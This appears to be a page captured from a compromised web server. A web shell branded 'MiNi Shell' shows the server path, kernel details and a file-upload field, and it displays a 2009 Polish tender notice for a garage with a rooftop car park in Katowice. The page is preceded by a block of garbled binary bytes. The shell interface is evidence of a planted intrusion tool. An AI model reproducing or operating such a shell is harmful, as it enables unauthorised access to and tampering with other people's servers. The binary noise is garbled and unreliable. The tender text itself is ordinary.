JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090109/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090109/3036-N-2009.html

<p class="kh_header"><b>Katowice: Zaprojektowanie i wykonanie jednokondygnacyjnego budynku garażu otwartego, częściowo zagłębionego z parkingiem na dachu</b><br>
<b>Numer ogłoszenia: 3036 - 2009; data zamieszczenia: 09.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Górnośląskie Przedsiębiorstwo Wodociągów S.A. , ul. Wojewódzka 19, 40-026 Katowice, woj. śląskie, tel. 032 6038861, faks 032 6038614.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gpw.katowice.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zaprojektowanie i wykonanie jednokondygnacyjnego budynku garażu otwartego, częściowo zagłębionego z parkingiem na dachu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia obejmuje wykonanie zamówienia podstawowego i zamówienia uzupełniającego.
2.	Przedmiotem zamówienia podstawowego jest zaprojektowanie i wykonanie jednokondygnacyjnego budynku garażu otwartego, częściowo zagłębionego z parkingiem na dachu dla budynku biurowego przy ul. Dąbrowskiego 23 w Katowicach z uwzględnieniem podwyższonego standardu wyposażenia (tj. wyposażonego w: system monitoringu na obu poziomach, system kontroli dostępu, podgrzewaną elektrycznie pochylnię, elementy zieleni na górnym poziomie) wraz z oświetleniem, odwodnieniem i oznakowaniem tablicami informacyjnymi, a także z zagospodarowaniem terenu wokół garażu oraz wykończeniem ściany przyziemia budynku biurowego od strony ul. Dąbrowskiego wraz z zabezpieczeniem konstrukcji izolacją przeciwwilgociową i cieplną, osuszenie ścian piwnic budynku Urzędu od strony Placu Chrobrego oraz wykonanie wykopów kontrolnych od strony Placu Chrobrego w celu określenia przez rzeczoznawców i specjalistów dokładnego zakresu prac do wykonania w związku z zawilgoceniem ściany piwnicznej budynku Urzędu Marszałkowskiego.
3.	Przedmiotem zamówienia uzupełniającego, w zależności od wyniku ekspertyzy, jest zaprojektowanie i wykonanie drenażu przy budynku Urzędu Marszałkowskiego od strony Placu Chrobrego z podłączeniem do istniejącej kanalizacji deszczowej, zaprojektowanie i wykonanie izolacji ściany przyziemia budynku Urzędu od strony Placu Chrobrego, zaprojektowanie i wykonanie wentylacji w pomieszczeniu piwnic - archiwum Urzędu Marszałkowskiego. W przypadku konieczności wykonania zamówienia uzupełniającego w związku z zaleceniami wynikającymi z ekspertyzy rzeczoznawców pełnomocnik przewiduje udzielenie zamówienia uzupełniającego wykonawcy, którego oferta zostanie uznana za najkorzystniejszą w niniejszym postępowaniu po przeprowadzeniu negocjacji dotyczących realizacji zamówienia uzupełniającego, przy czym pełnomocnik zastrzega, że podstawą ustalenia wynagrodzenia należnego wykonawcy za wykonanie zamówienia uzupełniającego będzie oferta dla zamówienia podstawowego.   
4.	Zakres rzeczowy podstawowego przedmiotu zamówienia obejmuje: 
-	inwentaryzację wykonanych robót budowlanych (wraz z operatem geodezyjnym wykonanych elementów),
-	wykonanie aktualizacji mapy dla celów projektowych w zakresie S+U+W+E wraz z wypisem z rejestru gruntów oraz dokumentacją geotechniczną do celów projektowych,
-	wykonanie uzgodnień branżowych z właścicielami infrastruktury podziemnej (sieci gazowe, sieci wod-kan., sieci teletechniczne, sieci elektryczne, sieci energetyczne, sieci c.o., itp.),
-	wykonanie uzgodnień branżowych z MZUiM w zakresie zajęcia pasa drogowego i projektu organizacji ruchu dla prowadzenia robót oraz uzgodnienie i zatwierdzenie docelowej organizacji ruchu,
-	wykonanie uzgodnień z zamawiającym i administratorem budynku Urzędu Marszałkowskiego,
-	wykonanie projektu budowlanego z uzyskaniem pozwolenia na budowę w zakresie wynikającym z Rozporządzenia Ministra Infrastruktury z dnia 03.07.2003r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. Nr 120 poz.1133) wraz z opracowaniem informacji dotyczącej bezpieczeństwa i ochrony zdrowia,
-	wykonanie wzajemnie skoordynowanych branżowych projektów wykonawczych wraz z przedmiarami i kosztorysami inwestorskimi,
-	wykonanie specyfikacji technicznych wykonania i odbioru robót budowlanych,
-	wykonanie jednokondygnacyjnego budynku garażu otwartego (nieogrzewanego, przewietrzanego naturalnie przez otwory okienne od strony ul. Dąbrowskiego oraz otwartą bramą wjazdową) z parkingiem na dachu (17 miejsc postojowych na dolnym poziomie, w tym 1 miejsce przystosowane dla osób niepełnosprawnych oraz 24 miejsca postojowe na górnym poziomie, w tym 2 miejsca postojowe przystosowane dla osób niepełnosprawnych), z wjazdem na poziom dolny z ul. Dąbrowskiego od strony ul. Reymonta i wjazdem na poziom górny od strony ul. Lompy, na górnym poziomie należy zainstalować stojaki dla rowerów oraz min. 3 maszty flagowe,
-	remont murków oporowych po stronie wschodniej i zachodniej od ul. Dąbrowskiego,
-	wykonanie remontu schodów zewnętrznych,
-	wykonanie uzupełnienia istniejących pilastrów w poziomie przyziemia istniejącego budynku,
-	wykonanie instalacji zimnej wody gospodarczej z możliwością odcięcia wody na okres zimowy wewnątrz budynku,
-	wykonanie instalacji ppoż. (jeśli jest wymagana),
-	wykonanie kanalizacji odwadniającej powierzchnię garażu (obu poziomów) z włączeniem do istniejącej kanalizacji poprzez wykonane separatory,
-	wykonanie instalacji elektrycznej dla podgrzewania pochylni umożliwiającej wjazd na górny poziom sterowanej czujnikiem temperatury,
-	wykonanie oświetlenia garażu (poziom dolny) załączanego z portierni budynku Urzędu,
-	wykonanie oświetlenia ewakuacyjnego kierunkowego (min.3h),
-	wykonanie oświetlenia zewnętrznego wejść głównych sterowanych wyłącznikiem zmierzchowym programowalnym,
-	wykonanie oświetlenia schodów zewnętrznych opartych na bazie opraw np. typu IP65 ze źródłem mocy 250W, 
-	wykonanie instalacji dla platform dla osób niepełnosprawnych, 
-	wykonanie systemu monitoringu umożliwiającego obserwację obu poziomów (dolnego i górnego) z portierni budynku, przy użyciu kamer obrotowych wraz z nowym monitorem i diwarem,
-	wykonanie systemu kontroli dostępu (na obu poziomach), poprzez zainstalowanie szlabanów uruchamianych przy pomocy kart zbliżeniowych,
-	wykonanie ochrony przeciwporażeniowej i przeciwprzepięciowej wykonanych instalacji, 
-	wykonanie organizacji ruchu - znaki drogowe i informacyjne oraz oznakowanie poziome na powierzchni parkingu,
-	zabudowanie dwóch platform dla niepełnosprawnych: na poziomie parteru na schodach wewnętrznych centralnej klatki schodowej w budynku biurowym dla osób niepełnosprawnych wjeżdżających od strony Placu Chrobrego oraz na schodach wewnętrznych w przedsionku budynku biurowego dla osób niepełnosprawnych wjeżdżających z poziomu piwnic garażu do budynku biurowego,
-	zagospodarowanie terenu wokół budynku garażu wraz z wykonaniem chodnika z kostki brukowej wzdłuż ul. Dąbrowskiego,
-	osuszenie ścian piwnic budynku Urzędu od strony Placu Chrobrego,
-	wykonanie robót przygotowawczych, uzupełniających i wykończeniowych,
-	uporządkowanie terenu po zakończeniu robót.
5.	Zakres rzeczowy uzupełniającego przedmiotu zamówienia obejmuje: 
-	wykonanie dokumentacji projektowej wraz z uzyskaniem właściwej decyzji administracyjnej zezwalającej na wykonanie robót budowlanych i wykonanie drenażu zewnętrznego budynku Urzędu Marszałkowskiego od strony Placu Chrobrego z podłączeniem go do istniejącej kanalizacji w ul. Lompy i ul. Reymonta,
-	wykonanie dokumentacji projektowej wraz z uzyskaniem właściwej decyzji administracyjnej zezwalającej na wykonania robót budowlanych i wykonanie izolacji ściany przyziemia budynku Urzędu od strony Placu Chrobrego,
-	wykonanie dokumentacji projektowej wraz z uzyskaniem właściwej decyzji administracyjnej zezwalającej na wykonanie robót budowlanych i wykonanie wentylacji w pomieszczeniu piwnic - archiwum Urzędu Marszałkowskiego.
-	wykonanie robót przygotowawczych, uzupełniających i wykończeniowych,
-	uporządkowanie terenu po zakończeniu robót.
6.	Przedmiotem zamówienia jest wykonanie usług oraz robót budowlanych: 
-	Przedmiot główny 		CPV 45200000-5 Roboty inżynieryjne i budowlane
-	Przedmiot dodatkowy	CPV 45223000-6 Roboty budowlane w zakresie konstrukcji
-	Przedmiot dodatkowy	CPV 45300000-0 Roboty instalacyjne w budynkach
-	Przedmiot dodatkowy	CPV 45400000-1 Roboty wykończeniowe w zakresie obiektów 
 budowlanych 
-	Przedmiot dodatkowy	CPV 71210000-0 Usługi architektoniczne i podobne
7.	Przedmiot zamówienia opisany jest programem funkcjonalno-użytkowym budowy jednokondygnacyjnego budynku garażu otwartego, częściowo zagłębionego z parkingiem na dachu został opracowany przez Panią Bożenę Kuś prowadzącą działalność gospodarczą pod nazwą Pracownia Projektowa Bożena Kuś, ul. Mieszczańska 2/12, 30-313 Kraków. Program funkcjonalno-użytkowy budowy jednokondygnacyjnego budynku garażu otwartego, częściowo zagłębionego z parkingiem na dachu będący integralną częścią specyfikacji istotnych warunków zamówienia stanowi załącznik nr 1 do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-5, 45.22.30.00-6, 45.30.00.00-0, 45.40.00.00-1, 71.21.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca, który przystąpi do niniejszego postępowania zobowiązany jest do wniesienia wadium w wysokości: 50.000zł (słownie: pięćdziesiąt tysięcy złotych).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	Pełnomocnik dopuszcza do udziału w niniejszym postępowaniu wykonawców, którzy:
1.1	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
1.2	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym                i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
1.3	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
1.4	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
2.	Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą (spełnia - nie spełnia) na podstawie informacji zawartych w dostarczonych przez wykonawców oświadczeniach i dokumentach. Nie spełnienie warunków udziału w postępowaniu będzie skutkować wykluczeniem wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Do oferty należy dołączyć następujące dokumenty i oświadczenia:
1.	Formularz ofertowy - zgodnie z załącznikiem nr 2 do SIWZ.
2.	Oświadczenie o spełnianiu warunków udziału w postępowaniu. W przypadku składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie musi być podpisane przez każdy podmiot - zgodnie z załącznikiem nr 3 do SIWZ.
3.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru                          lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej                   niż 6 miesięcy przed upływem terminu składania ofert. W przypadku składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia, właściwe dokumenty muszą być złożone przez każdy podmiot.
4.	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. W przypadku składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia, właściwe dokumenty muszą być złożone przez każdy podmiot.
5.	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym                                  w art.24 ust.1 p.4÷8 ustawy PZP, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia, właściwe dokumenty muszą być złożone przez każdy podmiot.
6.	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art.24 ust.1 p.9 ustawy PZP, wystawiona nie wcześniej niż 6 miesięcy przed terminem składania ofert. W przypadku składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia, właściwe dokumenty muszą być złożone przez każdy podmiot.
7.	Pełnomocnictwo do składania oświadczeń woli w imieniu wykonawcy, jeżeli nie wynika               to z dokumentu rejestrowego. 
8.	Dokument ustanawiający pełnomocnika do reprezentowania w postępowaniu wykonawców wspólnie ubiegających się o udzielenie zamówienia i zawarcia umowy w sprawie zamówienia publicznego. 
9.	Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie zgodnie z załącznikiem nr 4 do SIWZ. Pełnomocnik wymaga, aby wykonawca lub wykonawcy wspólnie ubiegający się o udzielenie zamówienia wykonali (zakończyli)w okresie ostatnich pięciu lat co najmniej 1 budynek garażu otwartego z parkingiem na dachu o kubaturze nie mniejszej niż 3000m3. Do wykazu należy dołączyć dokumenty potwierdzające należyte wykonanie robót.
10.	Wykaz wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie zgodnie z załącznikiem nr 5 do SIWZ. Pełnomocnik wymaga, aby wykonawca lub wykonawcy wspólnie ubiegający się o udzielenie zamówienia wykonali w okresie ostatnich trzech lat co najmniej 1 dokumentację projektową na podstawie której zrealizowano budynek garażu otwartego z parkingiem na dachu o kubaturze nie mniejszej niż 3000m3. Do wykazu należy dołączyć dokumenty potwierdzające, że roboty zostały wykonane z należytą starannością. 
11.	Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, a także zakresu wykonywanych przez nich czynności - zgodnie z załącznikiem nr 6 do SIWZ. Pełnomocnik wymaga, aby wykonawca lub wykonawcy wspólnie ubiegający się o udzielenie zamówienia dysponowali co najmniej jedną osobą posiadającą uprawnienia budowlane do projektowania: w specjalności architektonicznej, w specjalności konstrukcyjno-budowlanej, w specjalności instalacyjnej w zakresie sieci, instalacji wodociągowych i kanalizacyjnych, w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, a także co najmniej jedną osobą posiadającą licencję pracownika zabezpieczenia technicznego I stopnia oraz co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi: w specjalności konstrukcyjno-budowlanej, w specjalności instalacyjnej w zakresie sieci, instalacji wodociągowych i kanalizacyjnych, w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych , a także co najmniej jedną osobą posiadającą licencję pracownika zabezpieczenia technicznego II stopnia. Do wykazu należy dołączyć uprawnienia budowlane osób wyszczególnionych w wykazie wraz z aktualnym zaświadczeniem o przynależności do Okręgowej Izby Inżynierów Budownictwa.
12.	Bilans oraz rachunek zysków i strat za okres ostatnich trzech lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres, a w przypadku wykonawców nie zobowiązanych do sporządzenia bilansu, informacji określających obroty, zysk oraz zobowiązania i należności ogółem. W przypadku składania oferty przez podmioty występujące wspólnie dokumenty musi złożyć każdy podmiot.
13.	Polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności. W przypadku składania oferty przez podmioty występujące wspólnie dokumenty musi złożyć każdy podmiot. Zamawiający wymaga, aby kwota ubezpieczenia wykonawcy lub wykonawców wspólnie ubiegających się o udzielenie zamówienia wspólnie wynosiła co najmniej 500.000zł na jedno zdarzenie i co najmniej 1.500.000zł na wszystkie zdarzenia.
14.	Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Zamawiający wymaga, by wykonawca lub wykonawcy wspólnie ubiegający się o udzielenie zamówienia, posiadał środki własne lub zdolność kredytową w wysokości nie mniejszej niż 30% ceny ofertowej brutto.
15.	Parafowany wzór umowy (wraz z załącznikiem nr 1 i 2 do wzoru umowy) zgodnie z załącznikiem nr 7 do SIWZ. Do oferty nie należy dołączać załącznika nr 3 i 4 do umowy.
Uwaga: Załącznik nr 1 do wzoru umowy należy wypełnić w następujący sposób:
-	jeżeli wykonawca przewiduje wykonanie części zakresu rzeczowego przedmiotu zamówienia przez podwykonawcę - należy określić szczegółowy zakres robót, które zostaną zrealizowane przez podwykonawców wraz z określeniem wartości tych robót,
-	jeżeli wykonawca przewiduje, że całość zakresu rzeczowego przedmiotu zamówienia wykona samodzielnie - należy wpisać np.: nie dotyczy, przekreślić kolumny, itp.
16.	Formularz cenowy zgodnie z załącznikiem nr 8 do SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.zi.gpw.katowice.pl/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Górnośląskie Przedsiębiorstwo Wodociągów S.A. 40-206 Katowice, ul. Olimpijska 11.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.01.2009 godzina 09:00, miejsce: Górnośląskie Przedsiębiorstwo Wodociągów S.A. 40-206 Katowice, ul. Olimpijska 11, sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com